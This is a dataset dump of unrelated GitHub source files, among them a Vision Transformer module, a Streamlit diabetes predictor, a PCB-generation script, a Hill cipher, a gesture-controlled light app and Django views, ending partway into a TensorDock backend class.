+{"seq_id":"5071735133","text":"\"\"\"\nAdapted from https://github.com/lukemelas/simple-bert\n\"\"\"\n \nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch import Tensor \nfrom torch.nn import functional as F\n\nfrom PIL import Image\n\ndef split_last(x, shape):\n \"split the last dimension to given shape\"\n shape = list(shape)\n assert shape.count(-1) <= 1\n if -1 in shape:\n shape[shape.index(-1)] = int(x.size(-1) / -np.prod(shape))\n return x.view(*x.size()[:-1], *shape)\n\n\ndef merge_last(x, n_dims):\n \"merge the last n_dims to a dimension\"\n s = x.size()\n assert n_dims > 1 and n_dims < len(s)\n return x.view(*s[:-n_dims], -1)\n\n\nclass MultiHeadedSelfAttention(nn.Module):\n \"\"\"Multi-Headed Dot Product Attention\"\"\"\n def __init__(self, dim, num_heads, dropout):\n super().__init__()\n self.proj_q = nn.Linear(dim, dim)\n self.proj_k = nn.Linear(dim, dim)\n self.proj_v = nn.Linear(dim, dim)\n self.drop = nn.Dropout(dropout)\n self.n_heads = num_heads\n self.scores = None # for visualization\n\n def forward(self, x, mask, control=False, which_column=0, which_head=0, save_attention=False, fh=0, fw=0):\n \"\"\"\n x, q(query), k(key), v(value) : 
(B(batch_size), S(seq_len), D(dim))\n mask : (B(batch_size) x S(seq_len))\n * split D(dim) into (H(n_heads), W(width of head)) ; D = H * W\n \"\"\"\n # (B, S, D) -proj-> (B, S, D) -split-> (B, S, H, W) -trans-> (B, H, S, W)\n \n q, k, v = self.proj_q(x), self.proj_k(x), self.proj_v(x)\n q, k, v = (split_last(x, (self.n_heads, -1)).transpose(1, 2) for x in [q, k, v])\n # (B, H, S, W) @ (B, H, W, S) -> (B, H, S, S) -softmax-> (B, H, S, S)\n scores = q @ k.transpose(-2, -1) / np.sqrt(k.size(-1))\n \n if save_attention:\n # save img\n print(\"Save Attention!!!\")\n attention_np = scores[0, which_head, which_column, :].cpu().numpy()\n attention_np = np.exp(attention_np) / (np.exp(attention_np).sum() + 1e-10)\n print(attention_np.shape, attention_np.min(), attention_np.max())\n attention_np = attention_np[:-1].reshape(int(np.sqrt(attention_np.shape[0]-1)), int(np.sqrt(attention_np.shape[0]-1)))\n \n attention_np = (attention_np * 255).astype(np.uint8)\n\n print(f\"--------------------- larger {(attention_np > 10).sum()}\")\n im = Image.fromarray(attention_np).convert('RGB')\n im.save(save_attention)\n\n if control:\n scores = scores\n torch.manual_seed(control)\n\n # perturbation\n replacement = torch.rand(scores[0, which_head, which_column, :].shape[0])\n \n scores[0, which_head, which_column, :] = replacement\n if mask is not None:\n mask = mask[:, None, None, :].float()\n scores -= 10000.0 * (1.0 - mask)\n scores = self.drop(F.softmax(scores, dim=-1))\n # (B, H, S, S) @ (B, H, S, W) -> (B, H, S, W) -trans-> (B, S, H, W)\n h = (scores @ v).transpose(1, 2).contiguous()\n # -merge-> (B, S, D)\n h = merge_last(h, 2)\n self.scores = scores\n return h\n\n\nclass PositionWiseFeedForward(nn.Module):\n \"\"\"FeedForward Neural Networks for each position\"\"\"\n def __init__(self, dim, ff_dim):\n super().__init__()\n self.fc1 = nn.Linear(dim, ff_dim)\n self.fc2 = nn.Linear(ff_dim, dim)\n\n def forward(self, x):\n # (B, S, D) -> (B, S, D_ff) -> (B, S, D)\n return self.fc2(F.gelu(self.fc1(x)))\n\n\nclass Block(nn.Module):\n \"\"\"Transformer Block\"\"\"\n def __init__(self, dim, num_heads, ff_dim, dropout):\n super().__init__()\n self.attn = MultiHeadedSelfAttention(dim, num_heads, dropout)\n self.proj = nn.Linear(dim, dim)\n self.norm1 = nn.LayerNorm(dim, eps=1e-6)\n self.pwff = PositionWiseFeedForward(dim, ff_dim)\n self.norm2 = nn.LayerNorm(dim, eps=1e-6)\n self.drop = nn.Dropout(dropout)\n\n def forward(self, x, mask, control=False, which_column=0, which_head=0, save_attention=False, fh=0, fw=0):\n if save_attention: print(f\"fefefre save_attention {save_attention}\")\n # print(f\"??? 
x {x.shape}\")\n h = self.drop(self.proj(self.attn(self.norm1(x), mask, control, which_column=which_column, which_head=which_head, save_attention=save_attention, fh=fh, fw=fw) ))\n x = x + h\n h = self.drop(self.pwff(self.norm2(x)))\n x = x + h\n return x\n\n\nclass Transformer(nn.Module):\n \"\"\"Transformer with Self-Attentive Blocks\"\"\"\n def __init__(self, num_layers, dim, num_heads, ff_dim, dropout):\n super().__init__()\n self.blocks = nn.ModuleList([\n Block(dim, num_heads, ff_dim, dropout) for _ in range(num_layers)])\n\n def forward(self, x, mask=None, control_seed=1, which_column=0, which_head=0, which_block=1, save_attention=False, fh=0, fw=0):\n # print(\"-----\")\n for idx, block in enumerate(self.blocks):\n if idx == which_block:\n # print(f\"x {x.shape}\")\n if save_attention: print(\"save_attention transformer\")\n x = block(x, mask, control=control_seed, which_column=which_column, which_head=which_head, save_attention=save_attention, fh=fh, fw=fw)\n else:\n x = block(x, mask)\n return x\n","repo_name":"Crazy-Jack/ViT-Playerground","sub_path":"pytorch_pretrained_vit/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37501299015","text":"import streamlit as st\r\nimport pickle\r\nimport pandas as pd\r\n\r\n\r\ndef main():\r\n style = \"\"\"
<div style=\"background-color:#025246; padding:10px\">\r\n<h2 style=\"color:white; text-align:center;\">Diabetes Prediction App</h2>\r\n</div>
\"\"\"\r\n    st.markdown(style, unsafe_allow_html=True)\r\n    left, right = st.columns((2,2))\r\n    Pregnancies = left.number_input('Enter pregnancy count of the patient', step=1.0, format=\"%.1f\", value=0.0)\r\n    Glucose = right.number_input('Enter glucose level of the patient', step=1.0, format='%.2f', value=80.00)\r\n    BloodPressure = left.number_input('Enter your blood pressure (mmHg)', step=1.0, format='%.2f', value=66.00)\r\n    SkinThickness = right.number_input('Enter the Skin Thickness of the patient (mm)', step=1.0, format='%.2f', value=23.00)\r\n    Insulin = left.number_input('Enter insulin level of the patient', step=1.0, format='%.1f', value=0.0)\r\n    BMI = right.number_input('Enter BMI score of the patient', step=1.0, format='%.1f', value=28.0)\r\n    DiabetesPedigreeFunction = left.number_input('Enter your Diabetes Pedigree rate for the patient', step=1.0, format='%.3f', value=0.160)\r\n    Age = right.number_input('What is the current age for the patient', step=1.0, format='%.1f', value=43.0)\r\n    button = st.button('Predict')\r\n    # if button is pressed\r\n    if button:\r\n        # make prediction\r\n        result = predict(Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin,\r\n                         BMI, DiabetesPedigreeFunction, Age)\r\n        st.success(f'The diabetic outcome for the patient is {result}')\r\n\r\n\r\n\r\n\r\n\r\n# load the trained model\r\nwith open('diabetesModel1.pickle', 'rb') as rf:\r\n    model = pickle.load(rf)\r\n\r\n# load the StandardScaler\r\nwith open('scaler.pickle', 'rb') as stds:\r\n    scaler = pickle.load(stds)\r\n\r\ndef predict(Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin,\r\n            BMI, DiabetesPedigreeFunction, Age):\r\n    # processing user input\r\n    lists = [Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin,\r\n             BMI, DiabetesPedigreeFunction, Age]\r\n    df = pd.DataFrame(lists).transpose()\r\n    # scaling the data\r\n    df = scaler.transform(df)\r\n    # making predictions using the trained model\r\n    prediction = model.predict(df)\r\n    result = int(prediction)\r\n    return result\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"YanneseCode/diabetes-prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13250943719","text":"#!/usr/bin/python\n\n# 3rd party modules\nimport argparse\nimport psycopg2\n# internal modules\nimport ebase\n\n\nif __name__ == '__main__':\n    conn = ebase.db_conn()\n    cur = conn.cursor()\n\n    parser = argparse.ArgumentParser(\n        description=\"Imports parts from a Digi-Key csv file to the parts database.\")\n    parser.add_argument(\"file\", nargs=\"?\", help=\"csv file to import\",\n                        default=\"/home/matt/digikey.csv\")\n    args = parser.parse_args()\n\n    cur.execute(\"\"\"create temporary table tmp (index int, qty int, pn text, mfn text, description text, ref text,\n    backorder int, unit_price numeric(5,2), total_price text)\"\"\")\n\n    fname = args.file\n    ebase.csv_remove_quotes(fname)\n    with open(fname, 'r') as f:\n        if f.read(5) == \"Index\":\n            ebase.csv_remove_header(fname)\n    ebase.csv_remove_last_line(fname)\n\n    with open(fname, 'r') as f:\n        cur.copy_from(f, 'tmp', sep=',')\n\n    cur.execute(\"\"\"insert into parts (mfn, description, stock, unit_price) select mfn, description, qty, unit_price\n    from tmp on conflict (mfn) do update set stock = parts.stock + (select qty from tmp where tmp.mfn = parts.mfn)\"\"\")\n    cur.execute(\"\"\"drop table tmp\"\"\")\n\n    c = input(\"\\nCommit? 
y/n \")\n if c == 'y':\n conn.commit()\n elif c == 'n':\n print(\"Nothing done.\")\n exit(0)\n else:\n print(\"Must answer y/n.\")\n exit(1)\n\n cur.close()\n conn.close()\n","repo_name":"matthuszagh/ebase","sub_path":"import_digikey.py","file_name":"import_digikey.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29714373182","text":"from coordinates import LinearTransformer, CircularTransformer\nfrom circuit_board import CircuitBoard\nfrom subcircuit import get_subcircuit\nfrom primitive import get_primitive\nfrom coordinates import from_mm, to_mm\nimport gerbertools\nimport math\nimport sys\n\nmainboard = CircuitBoard(mask_expansion=0.05)\nt = LinearTransformer()\nget_primitive('mainboard').instantiate(mainboard, t, (0, 0), 0, '', {})\nt = CircularTransformer((0, 0), from_mm(159.15), 0)\nget_subcircuit('mainboard').instantiate(mainboard, t, (from_mm(500), from_mm(0.85)), math.pi/2, '', {})\n\nprint('*** pouring inner layer polygons...')\nmainboard.add_poly_pours()\n\nprint('*** writing gerber output...')\nmainboard.to_file('output/mainboard')\n\nprint('*** running circuit DRC...')\nany_violations = False\nif not mainboard.get_netlist().check_composite():\n any_violations = True\n\nprint('*** building light barrier guide...')\nbarrier_gbr = gerbertools.CircuitBoard('output/mainboard.PCB', '.GM1', '');\nbarrier_gbr.add_copper_layer('.LB', 2.5)\nbarrier_gbr.write_obj('output/mainboard.Barrier.obj')\n\nprint('*** building PCB...')\n#mainboard_gbr = gerbertools.read('output/mainboard.PCB')\nprint('outline and hole data...')\nmainboard_gbr = gerbertools.CircuitBoard('output/mainboard.PCB', '.GM1', '.TXT');\nprint('bottom mask...')\nmainboard_gbr.add_mask_layer('.GBS', '.GBO');\nprint('bottom layer...')\nmainboard_gbr.add_copper_layer('.GBL', 0.035)\nmainboard_gbr.add_substrate_layer(0.1)\nprint('vcc layer...')\nmainboard_gbr.add_copper_layer('.G2', 0.0175)\nmainboard_gbr.add_substrate_layer(1.265)\nprint('gnd layer...')\nmainboard_gbr.add_copper_layer('.G1', 0.0175)\nmainboard_gbr.add_substrate_layer(0.1)\nprint('top layer...')\nmainboard_gbr.add_copper_layer('.GTL', 0.035)\nprint('top mask...')\nmainboard_gbr.add_mask_layer('.GTS', '.GTO');\nprint('surface finish...')\nmainboard_gbr.add_surface_finish()\n\nprint('*** building acrylic plates...')\ndisplay_gbr = gerbertools.CircuitBoard('output/mainboard.Display', '.GM1', '')\ndisplay_gbr.add_substrate_layer(3)\n\nfront_gbr = gerbertools.CircuitBoard('output/mainboard.Front', '.GM1', '')\nfront_gbr.add_mask_layer('', '.GM2')\nfront_gbr.add_substrate_layer(3)\n\nhighlight_gbr = gerbertools.CircuitBoard('output/mainboard.Highlight', '.GM1', '')\nhighlight_gbr.add_substrate_layer(5)\n\nprint('*** rendering to SVG...')\nwith open('output/mainboard.normal.svg', 'w') as f:\n f.write('\\n')\n f.write('\\n')\n f.write(mainboard_gbr.get_svg(False, gerbertools.color.mask_white(), gerbertools.color.silk_black(), id_prefix='mainboard'))\n\n #f.write('\\n')\n #for part in mainboard.get_parts():\n #if part.get_layer() == 'Ctop':\n #f.write('{}\\n'.format(\n #to_mm(part.get_coord()[0]),\n #to_mm(part.get_coord()[1]),\n #-part.get_rotation() * 180 / math.pi,\n #part.get_name()))\n #f.write('\\n')\n #f.write('\\n')\n #for net in mainboard.get_netlist().iter_physical():\n #for layer, coord, mode in net.iter_points():\n #if layer == 'GTL':\n #f.write('{}\\n'.format(\n #to_mm(coord[0]),\n #to_mm(coord[1]),\n #net.get_name()))\n #f.write('\\n')\n\n 
f.write('\\n')\n f.write('\\n')\n f.write(display_gbr.get_svg(False, soldermask=(0, 0, 0, 0), silkscreen=(0.7, 0.7, 0.7, 0.8), substrate=(0.1, 0.1, 0.1, 0.95), id_prefix='display'))\n f.write(highlight_gbr.get_svg(False, soldermask=(0, 0, 0, 0), silkscreen=(0.7, 0.7, 0.7, 0.8), substrate=(0.95, 0.95, 0.95, 0.95), id_prefix='highlight'))\n f.write('\\n')\n f.write('\\n')\n f.write(front_gbr.get_svg(False, soldermask=(0, 0, 0, 0), silkscreen=(0.7, 0.7, 0.7, 0.8), substrate=(0.6, 0.6, 0.6, 0.05), id_prefix='front'))\n f.write('\\n')\n f.write('\\n')\n\nmainboard_gbr.write_svg('output/mainboard.front.svg', False, 50.0, gerbertools.color.mask_white(), gerbertools.color.silk_black())\nmainboard_gbr.write_svg('output/mainboard.back.svg', True, 50.0, gerbertools.color.mask_white(), gerbertools.color.silk_black())\n\nprint('*** rendering to OBJ...')\nmainboard_gbr.write_obj('output/mainboard.PCB.obj')\ndisplay_gbr.write_obj('output/mainboard.Display.obj')\nfront_gbr.write_obj('output/mainboard.Front.obj')\nhighlight_gbr.write_obj('output/mainboard.Highlight.obj')\n\nprint('*** running physical DRC...')\nnets = []\nnl = mainboard.get_netlist()\nfor net in nl.iter_physical():\n name = nl.get_true_net_name(net.get_name())\n for layer, (x, y), mode in net.iter_points():\n layer = {\n 'GBS': 0,\n 'GBL': 0,\n 'G2': 1,\n 'G1': 2,\n 'GTL': 3,\n 'GTS': 3,\n }[layer]\n nets.append(((to_mm(x), to_mm(y)), layer, name))\nviolations = mainboard_gbr.build_netlist(nets, clearance=0.13, annular_ring=0.13).drc()\nfor violation in violations:\n if violation.startswith('logical net NO_NET is divided up into'):\n continue\n print(violation)\n any_violations = True\n\nprint()\nif any_violations:\n print('There were DRC errors :(')\n sys.exit(1)\nelse:\n print('Everything checks out! 
:D')\n\n","repo_name":"jvanstraten/gated-clock","sub_path":"generator/compose_mainboard.py","file_name":"compose_mainboard.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"37582555928","text":"def Hill(plainTextBlock, keyMatrix, mode):\r\n\r\n value, genText = 0, \"\"\r\n\r\n for i in range(mode):\r\n\r\n for j in range(mode): value += ( ord( keyMatrix[i][j] ) - 65 ) * ( ord( plainTextBlock[j] ) - 65 )\r\n\r\n genText += chr( 65 + ( value % 26 ) ) \r\n value = 0\r\n\r\n return genText\r\n\r\ndef HillSplit(plainText, key, mode):\r\n\r\n plainText, key, textLen, keyLen = plainText.upper(), key.upper(), len(plainText), len(key)\r\n keyValues = [ (ord(key[i])-65) for i in range(len(key)) ]\r\n textSplit, cipher, x, token = [], \"\", 0, 3 if mode == \"T\" else 2 \r\n\r\n if textLen % token != 0: plainText += \"\".join( \"K\" for i in range( token - textLen % token ))\r\n\r\n if keyLen < pow(token,2): key += \"\".join( chr(65+i) for i in range( pow(token,2) - keyLen )) \r\n else : key = \"\".join( key[char] for char in range( pow(token,2) ) )\r\n\r\n keySplit = [ key[i:i+token] for i in range(0,len(key),token)]\r\n textSplit += [ plainText[x:x+token] for x in range(0, len(plainText), token) ]\r\n cipher += \"\".join( Hill( textSplit[i], keySplit, token ) for i in range(len(textSplit)))\r\n \r\n return cipher\r\n \r\npT = input(\"Enter plain text for encryption : \").replace(\" \",\"\")\r\nmode = input(\"Press D for digraph \\nPress T for trigraph : ___\")\r\nkey = input(\"Enter the key : \").replace(\" \",\"\")\r\nprint(HillSplit(pT,key, mode))","repo_name":"ohoadit/ciphers","sub_path":"Hill.py","file_name":"Hill.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23194706257","text":"from django.core.validators import FileExtensionValidator\nfrom django.db import models\nfrom django.contrib.auth.models import Group\n\n\nclass Documento(models.Model):\n documento = models.CharField(max_length=255)\n upload = models.FileField(upload_to='documento/', validators=[FileExtensionValidator(allowed_extensions=['pdf'])])\n descricao = models.TextField('descrição', blank=True, null=True)\n criado = models.DateTimeField( 'criado em', auto_now_add=True, auto_now=False)\n modificado = models.DateTimeField( 'modificado em', auto_now_add=False, auto_now=True)\n grupo = models.ManyToManyField(Group, blank=True)\n\n\n class Meta :\n ordering = ['modificado','documento']\n\n def __str__(self):\n return f\"{self.documento}\"\n","repo_name":"marcelogumercinocosta/portal","sub_path":"apps/biblioteca/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"27236221441","text":"# Justpy Tutorial demo for_example2 from docs/blog/vue_comparison.md\nimport justpy as jp\n\ndef for_example2():\n wp = jp.WebPage(tailwind=False)\n ul = jp.Ul(a=wp)\n ul.items = [{'message': 'Foo'},\n {'message': 'Bar'}]\n ul.parent_message = 'Parent'\n for index, item in enumerate(ul.items):\n jp.Li(text=f'{ul.parent_message}-{index}-{item[\"message\"]}', a=ul)\n return wp\n\n# initialize the demo\nfrom examples.basedemo import Demo\nDemo 
(\"for_example2\",for_example2)\n","repo_name":"justpy-org/justpy","sub_path":"examples/blog/vue_comparison/for_example2.py","file_name":"for_example2.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1107,"dataset":"github-code","pt":"43"} +{"seq_id":"74495764608","text":"import os\nimport cv2\nimport mediapipe as mp\nimport numpy as np\nfrom dotenv import load_dotenv\nfrom light_ctrl import LightController\n\nload_dotenv()\n\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\nTOKEN = os.getenv('TOKEN')\n\nlight = LightController(TOKEN)\n\ndef is_fist(results):\n # Minimum distance fingers need to be from wrist\n MIN_DIST = 0.17\n\n # Finger and wrsit (x,y) coordinates\n middle_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y])\n\n ring_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y])\n\n pinky_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.PINKY_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.PINKY_TIP].y])\n\n wrist = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.WRIST].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.WRIST].y])\n\n # Calcuating Euclidean distance between wrist and fingers\n dist_middle = np.linalg.norm(middle_finger-wrist)\n dist_ring = np.linalg.norm(ring_finger-wrist)\n dist_pinky = np.linalg.norm(pinky_finger-wrist)\n\n # Check if all fingers are the minimum distance from wrist\n if dist_middle < MIN_DIST and dist_ring < MIN_DIST and dist_pinky < MIN_DIST:\n return True\n\n return False\n\ndef is_three_finger_pinch(results):\n # Minimum distance between thumb, ring, and middle finger\n MIN_DIST = 0.1\n\n middle_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y])\n\n ring_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y])\n\n thumb = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.THUMB_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.THUMB_TIP].y])\n\n dist_middle = np.linalg.norm(middle_finger-thumb)\n dist_ring = np.linalg.norm(ring_finger-thumb)\n\n if dist_middle < MIN_DIST and dist_ring < MIN_DIST:\n return True\n\n return False\n\ndef is_two_finger(results):\n # Minimum distance between index and middle finger\n MIN_DIST_FINGERS_UP = 0.1\n # Minimum distance between ring and pink finger and wrist\n MIN_DIST_FINGERS_DOWN = 0.3\n\n middle_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y])\n\n index_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].y])\n\n ring_finger = 
np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y])\n\n pinky_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.PINKY_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.PINKY_TIP].y])\n\n wrist = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.WRIST].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.WRIST].y])\n\n dist_middle_index = np.linalg.norm(middle_finger-index_finger)\n dist_pinky_wrist = np.linalg.norm(pinky_finger-wrist)\n dist_ring_wrist = np.linalg.norm(ring_finger-wrist)\n\n if dist_middle_index < MIN_DIST_FINGERS_UP and dist_pinky_wrist < MIN_DIST_FINGERS_DOWN and dist_ring_wrist < MIN_DIST_FINGERS_DOWN:\n return True\n\n return False\n\n# For webcam input:\ncap = cv2.VideoCapture(0)\n\nwith mp_hands.Hands(min_detection_confidence=0.8, min_tracking_confidence=0.5) as hands:\n while cap.isOpened():\n success, image = cap.read()\n\n # Ignoring empty camera frame.\n if not success:\n continue\n\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = hands.process(image)\n image.flags.writeable = True\n\n # Index finger x coordinate used for brightness change\n index_finger_x = None\n\n # Flags for light state changes\n was_turned_off = False\n was_turned_on = False\n had_brightness_changed = False\n\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n # Draw finger and joint marks on image\n mp_drawing.draw_landmarks(\n image,\n hand_landmarks,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style())\n\n # Turn light off if fist is detected\n if is_fist(results):\n light.turn_off(go_fast=True)\n was_turned_off = True\n\n if is_three_finger_pinch(results):\n light.turn_on(go_fast=True)\n was_turned_on = True\n\n # Enter brightness mode if index and middle finger raised is detected\n if is_two_finger(results):\n # Get index finger x coordinate minus 1 to account for image flip\n index_finger_x = round(1 - results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x, 1)\n light.set_brightness(index_finger_x, go_fast=True)\n had_brightness_changed = True\n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = cv2.flip(image, 1)\n\n # Add text to image based on light state changes\n if had_brightness_changed:\n cv2.putText(image, 'Brightness: ' + str(int(index_finger_x * 100)) + '%', (50, 50), cv2.FONT_HERSHEY_DUPLEX, \n 1, (255, 195, 0), 2, cv2.LINE_AA)\n \n if was_turned_on:\n cv2.putText(image, 'Light On', (50, 50), cv2.FONT_HERSHEY_DUPLEX, \n 1, (247, 255, 71), 2, cv2.LINE_AA)\n\n if was_turned_off:\n cv2.putText(image, 'Light Off', (50, 50), cv2.FONT_HERSHEY_DUPLEX, \n 1, (0, 0, 0), 2, cv2.LINE_AA)\n\n cv2.imshow('Lumand', image)\n\n #press ESC key to exit\n if cv2.waitKey(5) & 0xFF == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Diego-Segovia/Lumand","sub_path":"light_controller/hand_controller.py","file_name":"hand_controller.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"15443546575","text":"import pandas as pd\n\ndata = pd.read_csv(\"processed.csv\")\nexp_to_title = {}\nfor row in data.iterrows():\n exp, title, _, _, _, _ = row[1]\n if 
exp not in exp_to_title:\n exp_to_title[exp] = set(title)\n else:\n exp_to_title[exp].add(title)\n\nintersection = None\nfor k, v in exp_to_title.items():\n if intersection is None:\n intersection = v\n else:\n intersection = intersection.intersection(v)\n\nvalid_jobs = [x for x in intersection if len(x)>1]\nprint(valid_jobs)\n\n#data[data['job_title'].isin(valid_jobs)].to_csv(\"valid_jobs.csv\", index=False)","repo_name":"ComanacDragos/University","sub_path":"Semester 2 Master/KD/triadic_dataset/filter_jobs.py","file_name":"filter_jobs.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"34409041912","text":"\n#coding=utf-8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseRedirect,JsonResponse\nfrom django.core.urlresolvers import reverse\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport os,stat,socket,traceback\nimport subprocess,threading\nimport time,datetime\nimport base64\nimport json\nimport re\nfrom car.models import Axisdata,Carphoto,Heartdata\n\n@csrf_exempt\ndef handle_index(request):\n #return render(request,\"index/index.html\")\n return HttpResponseRedirect(reverse(\"car:car_constantly\"))\n\n@csrf_exempt\ndef handle_car_constantly(request):\n \"\"\"\n 实时数据展示\n {\n \"photo_time\":\"12345678\",\"plate_number\":\"冀J0R6A3\",\"photo_paht\":\"/var/ftp/pub/luo/20180607/冀J0R6A3\", # CarPhoto\n \"total_weight\":\"100kg\",\"speed\":\"80\",\"temperature\":\"90\", # HeartData\n \"savedb_time\":\"1992202020\", # AxisData\n \"car_axle1\":\"80kg\",\n \"car_axle2\":\"80kg\",\n \"car_axle3\":\"80kg\",\n \"car_axle4\":\"80kg\",\n \"car_axle5\":\"80kg\",\n \"car_axle6\":\"80kg\",\n \"car_axle7\":\"80kg\",\n \"car_axle8\":\"80kg\",\n \"car_axle9\":\"80kg\",\n \"car_axle10\":\"80kg\",\n }\n \"\"\"\n if request.method == \"GET\":\n car_obj = [{\n \"photo_time\":\"12345678\",\"plate_number\":\"冀J0R6A3\",\"photo_path\":\"/var/ftp/pub/luo/20180607/冀J0R6A3\",\n \"total_weight\":\"100kg\",\"speed\":\"80\",\"temperature\":\"90\",\n \"savedb_time\":\"1992202020\",\n }]\n return render(request,\"car/car_constantly.html\",{\"car_obj\":car_obj})\n\n elif request.method == \"POST\":\n car_obj = [{\n \"photo_time\":\"12345678\",\n\t\t \"plate_number\":\"冀J0R6A3\",\n\t \t \"photo_path\":\"\\\"system_process-img\\\"\",\n \"savedb_time\":\"1992202020\",\n \"total_weight1\":\"100kg\",\n \"total_weight2\":\"100kg\",\n }]\n \n from car.models import Axisdata,Carphoto,Heartdata\n CarPhoto_set = Carphoto.objects.all().order_by(\"-id\")[:10]\n Axisdata_set = Axisdata.objects.all()\n list1 = []\n for obj in CarPhoto_set:\n car_line ={\n \"photo_time\":None,\n\t\t \"plate_number\":None,\n\t \t \"photo_path\":None,\n \"savedb_time\":None,\n \"total_weight1\":None,\n \"total_weight2\":None\n }\n car_newest_ticks = Axisdata.objects.filter(carno = obj.carno).order_by('-id')[0].ticks\n car_info_set = Axisdata.objects.filter(ticks = car_newest_ticks)\n car_line[\"photo_time\"] = obj.ticks\n car_line[\"plate_number\"] = obj.carno\n car_line[\"photo_path\"] = obj.pathname\n car_line[\"savedb_time\"] = car_newest_ticks\n car_line[\"total_weight1\"] = 100\n car_line[\"total_weight2\"] = 100\n list1.append(car_line)\n\n \n data ={\n \"draw\":1,\n \"recordsTotal\":1,\n \"recordsFiltered\":1,\n \"data\":list1\n }\n return JsonResponse(data)\n 
\n","repo_name":"945941192/car_project","sub_path":"car_site/car/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35593389613","text":"import json\nfrom typing import List, Optional\n\nimport requests\n\nfrom dstack._internal.core.backends.base import Compute\nfrom dstack._internal.core.backends.base.compute import get_shim_commands\nfrom dstack._internal.core.backends.base.offers import get_catalog_offers\nfrom dstack._internal.core.backends.tensordock.api_client import TensorDockAPIClient\nfrom dstack._internal.core.backends.tensordock.config import TensorDockConfig\nfrom dstack._internal.core.errors import NoCapacityError\nfrom dstack._internal.core.models.backends.base import BackendType\nfrom dstack._internal.core.models.instances import (\n InstanceAvailability,\n InstanceOfferWithAvailability,\n LaunchedInstanceInfo,\n)\nfrom dstack._internal.core.models.runs import Job, Requirements, Run\nfrom dstack._internal.utils.logging import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass TensorDockCompute(Compute):\n def __init__(self, config: TensorDockConfig):\n self.config = config\n self.api_client = TensorDockAPIClient(config.creds.api_key, 